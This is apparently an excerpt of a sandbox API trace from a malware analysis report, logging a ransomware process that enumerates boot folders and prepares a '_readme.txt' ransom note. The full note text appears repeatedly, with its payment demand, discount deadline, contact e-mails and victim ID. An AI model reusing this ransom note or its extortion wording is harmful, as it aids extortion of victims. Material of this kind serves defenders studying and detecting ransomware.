RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.749] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0200.749] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.749] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.749] PathFindFileNameW (pszPath="") returned="" [0200.749] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.749] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.749] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.749] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.750] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0200.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.750] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0200.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.750] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.750] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.750] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.750] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.751] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.751] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.751] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.751] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.751] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 